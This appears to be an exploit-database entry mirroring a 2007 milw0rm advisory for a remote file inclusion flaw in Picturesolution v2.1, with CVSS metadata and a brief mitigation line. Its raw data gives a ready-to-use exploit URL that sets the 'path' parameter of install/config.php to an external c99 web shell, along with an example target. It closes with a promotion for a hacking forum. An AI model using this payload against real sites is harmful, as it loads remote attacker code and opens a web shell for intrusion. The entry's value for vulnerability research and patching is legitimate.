Picturesolution - exploit.company

vendor:

Picturesolution

by:

Mogatil, Cold z3ro

5.5

CVSS

MEDIUM

Remote File Inclusion

CWE

Product Name: Picturesolution

Affected Version From: <= v2.1

Affected Version To: <= v2.1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Picturesolution <= v2.1 (config.php path) Remote File Inclusion Vulnerabilities

The vulnerability allows an attacker to include a remote file by exploiting the 'config.php' file path in the 'install' directory. This can be achieved by appending a malicious URL to the 'path' parameter in the 'config.php' file.

Mitigation:

To mitigate the vulnerability, it is recommended to update to a patched version of Picturesolution or apply a security patch provided by the vendor.

Source

Exploit-DB raw data:

Picturesolution <= v2.1 (config.php path) Remote File Inclusion Vulnerabilities

Found By : Mogatil , http://www.hackteach.org/cc/ 
Posted By : Cold z3ro , http://www.hackteach.org/cc/


Exploit :

/install/config.php?path=http://membres.lycos.fr/prirato1/c99.txt?


Example :
http://www.xxx.de/Picssolution/install/config.php?path=http://membres.lycos.fr/prirato1/c99.txt?


==================================================
==================================================
Note To All Frindes And Milw0rm users :

http://www.hackteach.org/cc/ Is Back , Join Us !
Use Our English Forum From This link 
http://today4host.net/scripts/short/?id=682
==================================================
==================================================

# milw0rm.com [2007-10-06]